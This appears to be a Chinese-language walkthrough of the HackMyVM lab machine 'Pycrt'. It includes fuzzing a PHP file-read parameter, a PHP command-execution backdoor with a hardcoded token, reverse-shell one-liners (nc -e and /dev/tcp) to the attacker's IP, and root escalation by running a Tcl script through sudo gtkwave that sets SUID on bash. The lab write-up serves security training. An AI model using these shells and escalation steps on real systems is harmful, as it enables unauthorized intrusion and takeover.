hackmyvm_Pycrt

扫描

80端口只有一个默认的apache页面没有扫描出其他的页面

但是 端口6667有个IRC服务(互联网中继聊天服务)

我们nc连接并发送一些标准的IRC命令来注册你的昵称和用户信息

┌──(root㉿kali)-[~]
└─# nc 192.168.56.106 6667
:irc.local NOTICE * :*** Looking up your hostname...
NICK kali_pentester
:irc.local NOTICE * :*** Could not resolve your hostname: Request timed out; using your IP address (192.168.56.103) instead.

USER kali 0 * :Kali Pentester
:irc.local 001 kali_pentester :Welcome to the Localnet IRC Network kali_pentester!kali@192.168.56.103
:irc.local 002 kali_pentester :Your host is irc.local, running version InspIRCd-3
:irc.local 003 kali_pentester :This server was created 09:36:52 May 27 2025
:irc.local 004 kali_pentester irc.local InspIRCd-3 iosw biklmnopstv :bklov
:irc.local 005 kali_pentester AWAYLEN=200 CASEMAPPING=rfc1459 CHANLIMIT=#:20 CHANMODES=b,k,l,imnpst CHANNELLEN=64 CHANTYPES=# ELIST=CMNTU HOSTLEN=64 KEYLEN=32 KICKLEN=255 LINELEN=512 MAXLIST=b:100 :are supported by this server
:irc.local 005 kali_pentester MAXTARGETS=20 MODES=20 NAMELEN=128 NETWORK=Localnet NICKLEN=30 PREFIX=(ov)@+ SAFELIST STATUSMSG=@+ TOPICLEN=307 USERLEN=10 USERMODES=,,s,iow WHOX :are supported by this server
:irc.local 251 kali_pentester :There are 0 users and 0 invisible on 1 servers
:irc.local 253 kali_pentester 1 :unknown connections
:irc.local 254 kali_pentester 0 :channels formed
:irc.local 255 kali_pentester :I have 0 clients and 0 servers
:irc.local 265 kali_pentester :Current local users: 0  Max: 1
:irc.local 266 kali_pentester :Current global users: 0  Max: 1
:irc.local 375 kali_pentester :irc.local message of the day
:irc.local 372 kali_pentester : **************************************************
:irc.local 372 kali_pentester : *             H    E    L    L    O              *
:irc.local 372 kali_pentester : *  This is a private irc server. Please contact  *
:irc.local 372 kali_pentester : *  the admin of the server for any questions or  *
:irc.local 372 kali_pentester : *  issues ShadowSec directory.                   *
:irc.local 372 kali_pentester : **************************************************
:irc.local 372 kali_pentester : *  The software was provided as a package of     *
:irc.local 372 kali_pentester : *  Debian GNU/Linux <https://www.debian.org/>.   *
:irc.local 372 kali_pentester : *  However, Debian has no control over this      *
:irc.local 372 kali_pentester : *  server.                                       *
:irc.local 372 kali_pentester : **************************************************
:irc.local 372 kali_pentester : (The sysadmin possibly wants to edit </etc/inspircd/inspircd.motd>)
:irc.local 376 kali_pentester :End of message of the day.
PING :irc.local
ERROR :Closing link: (kali@192.168.56.103) [Ping timeout: 120 seconds]

得到一个目录ShadowSec

得到一个用户ID:ll104567

用big本去扫描目录扫到

/bydataset.php

Nothing to see here. 

在这个页面模糊测试

curl -s -w "%{size_download}\n" "http://192.168.56.106/ShadowSec/bydataset.php?abc=123" -o /dev/null
测出无效响应的大小
ffuf -u 'http://192.168.55.36/ShadowSec/bydataset.php?FUZZ=../../.././../../etc/passwd' \
-w /myift/fuzzDicts/fuzzDicts-master/paramDict/AllParam.txt -fs 21 -c

测出file参数可进行文件读取

伪协议读一下源码

<?php

function decrypt($input) {
    $reversed = strrev($input);
    echo "Reversed: " . $reversed . "\n";

    $decoded = base64_decode($reversed);
    echo "Decoded: " . $decoded . "\n";

    if ($decoded === false) {
        echo "Base64 decoding failed.\n";
        return false;
    }

    if (strpos($decoded, 'cmd:') === 0) {
        return substr($decoded, 4);
    }

    return false;
}

if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['file'])) {
    $file = $_GET['file'];
    if (stripos($file, 'phpinfo') !== false) {
        exit('Access Denied');
    }
    $filterUrl = 'php://filter/convert.base64-encode/resource=' . $file;
    $data = @file_get_contents($filterUrl);
    if ($data === false) {
        exit('Failed to read file');
    }
    echo base64_decode($data);
    exit;
} elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['auth']) && isset($_POST['payload'])) {
    $auth = $_POST['auth'];
    $payload = $_POST['payload'];

    if ($auth !== 'LetMeIn123!') {
        exit('Invalid Auth Token.');
    }

    $command = decrypt($payload);
    if ($command !== false) {
        $output = exec($command);
        echo "<pre>$output</pre>";
    } else {
        echo "Payload decode failed.\n";
    }
    exit;
} else {
    echo "Nothing to see here.";
}
?>

源码逻辑很简单就是直接执行命令

auth 参数： 必须是 LetMeIn123!
payload 参数： 需要经过两层编码：
你的命令前面加上 cmd:
对 cmd: 进行 Base64 编码
对 Base64 编码后的字符串进行反转

直接弹shell即可

有weechat

这里要注意要把shell升级为交互形稳固状态才能成功启动

/exec busybox nc 192.168.56.103 1234 -e /bin/sh

/exec !bash -i >& /dev/tcp/192.168.56.103/1234 0>&1
直接弹shell

继续提权

chatlake@PyCrt:~$ sudo -l
Matching Defaults entries for chatlake on PyCrt:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User chatlake may run the following commands on PyCrt:
    (ALL) NOPASSWD: /usr/bin/systemctl start irc_bot.service

这个文件不能看但是可以运行

systemctl cat irc_bot.service 命令的作用是显示 irc_bot.service 服务的完整配置文件内容。
chatlake@PyCrt:~$ systemctl cat irc_bot.service
# /etc/systemd/system/irc_bot.service
[Unit]
Description=IRC Bot Service
After=network.target

[Service]
User=pycrtlake
Group=pycrtlake
WorkingDirectory=/usr/local/bin
ExecStart=/usr/bin/python3 /usr/local/bin/irc_bot.py
Restart=always
RestartSec=5
StandardOutput=syslog
StandardError=syslog
Environment=PYTHONUNBUFFERED=1

[Install]
WantedBy=multi-user.target
chatlake@PyCrt:~$ ls
user.txt
chatlake@PyCrt:~$ find / -name "user.txt" 2>/dev/null
^[[D^[[D/home/chatlake/user.txt
chatlake@PyCrt:~$ find / -name "irc_bot.py" 2>/dev/null
/usr/local/bin/irc_bot.py
chatlake@PyCrt:~$ find / -name "irc_bot.service" 2>/dev/null
/etc/systemd/system/irc_bot.service

//服务将以 pycrtlake 用户的身份运行

启动服务看一下

启动之后重新启动wechat

然后添加server取名叫irc

连接到本地irc服务器中

/server add irc 127.0.0.1/6667
/connect irc

发现有六个频道

前面发现的用户id:ll104567

设为昵称 /nick ll104567

进入频道返现没有什么东西

/join  #chan1

在频道6

随便发点东西过一会会发来一条提示

│03:45:07 ll104567 | 2                                                                                                                                                                        │
│03:45:08 ll104567 | 1                                                                                                                                                                        │
│03:45:08 ll104567 | 3                                                                                                                                                                        │
│03:45:48   @admin | My friends and I are chatting on it, but we all follow the formatting requirements. Finally, we need to:) End 

得知发送的消息要以:)结尾

03:48:44 ll104567 | 111:)                                                                                                                                                                    │
│03:48:48   @admin | My friends and I are chatting on it, but we all follow the formatting requirements. Finally, we need to:) End 

但是在频道中聊天没有什么用我们去找admin私聊

/query admin

最后经过不断尝试才发现在#chan1发消息

然后admin私聊回复你……

我们发送数字会给我们返回一下符号字母什么的很明显是ASCII码

可以执行命令

直接弹shell

shell很不稳定拿到之后第一时间稳定shell

pycrtlake@PyCrt:~$ sudo -l
Matching Defaults entries for pycrtlake on PyCrt:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pycrtlake may run the following commands on PyCrt:
    (ALL) NOPASSWD: /usr/bin/gtkwave

gtkwave命令执行

pycrtlake@PyCrt:~$ sudo gtkwave -h
\Could not initialize GTK!  Is DISPLAY env var/xhost set?

Usage: gtkwave [OPTION]... [DUMPFILE] [SAVEFILE] [RCFILE]

  -n, --nocli=DIRPATH        use file requester for dumpfile name
  -f, --dump=FILE            specify dumpfile name
  -F, --fastload             generate/use VCD recoder fastload files
  -o, --optimize             optimize VCD to FST
  -a, --save=FILE            specify savefile name
  -A, --autosavename         assume savefile is suffix modified dumpfile name
  -r, --rcfile=FILE          specify override .rcfile name
  -d, --defaultskip          if missing .rcfile, do not use useful defaults
  -D, --dualid=WHICH         specify multisession identifier
  -l, --logfile=FILE         specify simulation logfile name for time values
  -s, --start=TIME           specify start time for LXT2/VZT block skip
  -e, --end=TIME             specify end time for LXT2/VZT block skip
  -t, --stems=FILE           specify stems file for source code annotation
  -c, --cpu=NUMCPUS          specify number of CPUs for parallelizable ops
  -N, --nowm                 disable window manager for most windows
  -M, --nomenus              do not render menubar (for making applets)
  -S, --script=FILE          specify Tcl command script file for execution
  -T, --tcl_init=FILE        specify Tcl command script file to be loaded on startup
  -W, --wish                 enable Tcl command line on stdio
  -R, --repscript=FILE       specify timer-driven Tcl command script file
  -P, --repperiod=VALUE      specify repscript period in msec (default: 500)
  -X, --xid=XID              specify XID of window for GtkPlug to connect to
  -1, --rpcid=RPCID          specify RPCID of GConf session
  -2, --chdir=DIR            specify new current working directory
  -3, --restore              restore previous session
  -4, --rcvar                specify single rc variable values individually
  -5, --sstexclude           specify sst exclusion filter filename
  -I, --interactive          interactive VCD mode (filename is shared mem ID)
  -C, --comphier             use compressed hierarchy names (slower)
  -g, --giga                 use gigabyte mempacking when recoding (slower)
  -L, --legacy               use legacy VCD mode rather than the VCD recoder
  -v, --vcd                  use stdin as a VCD dumpfile
  -O, --output=FILE          specify filename for stdout/stderr redirect
  -z, --slider-zoom          enable horizontal slider stretch zoom
  -V, --version              display version banner then exit
  -h, --help                 display this help then exit
  -x, --exit                 exit after loading trace (for loader benchmarks)

VCD files and save files may be compressed with zip or gzip.
GHW files may be compressed with gzip or bzip2.
Other formats must remain uncompressed due to their non-linear access.
Note that DUMPFILE is optional if the --dump or --nocli options are specified.
SAVEFILE and RCFILE are always optional.

Report bugs to <bybell@rocketmail.com>.

-S, --script=FILE 和 -T, --tcl_init=FILE：指定 Tcl 脚本文件

这是最直接的风险点。Tcl 是一种脚本语言，如果 gtkwave 允许通过这些参数加载并执行任意 Tcl 脚本文件，那么攻击者就可以创建一个 Tcl 脚本，在其中包含系统命令（例如 exec "bash -i", system "chmod 4755 /bin/sh" 等）。
由于 pycrtlake 可以 sudo gtkwave，这意味着这个 Tcl 脚本将以 root 权限执行，从而导致任意命令执行和直接提权。
风险等级：高。这是此类漏洞的经典利用方式。

我们先创建一个利用文件

echo "exec chmod u+s /bin/bash" > /tmp/root_shell.tcl

但是执行失败是因为没有图形界面

可以用 Xvfb创建一个虚拟显示设备

它可以创建一个虚拟的 X 服务器，从而在没有物理显示器或图形界面的系统上（比如服务器）运行图形应用程序。

启动 Xvfb

Xvfb :99 -screen 0 1024x768x24 &

在即将运行 gtkwave 的终端会话中，需要设置 DISPLAY 环境变量，指向刚刚启动的 Xvfb 实例。

export DISPLAY=:99

pycrtlake@PyCrt:~$ echo "exec chmod u+s /bin/bash" > /tmp/root_shell.tcl
pycrtlake@PyCrt:~$ sudo /usr/bin/gtkwave -S /tmp/root_shell.tcl

GTKWave Analyzer v3.3.118 (w)1999-2023 BSI

GTKWAVE | Use the -h, --help command line flags to display help.

(gtkwave:1304): dconf-WARNING **: 06:57:12.187: failed to commit changes to dconf: Failed to execute child process ?dbus-launch? (No such file or directory)
GTKWAVE | Executing Tcl script '/tmp/root_shell.tcl'
^C
pycrtlake@PyCrt:~$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash
pycrtlake@PyCrt:~$ bash -p
bash-5.0# whoami
root
bash-5.0# 

得到flag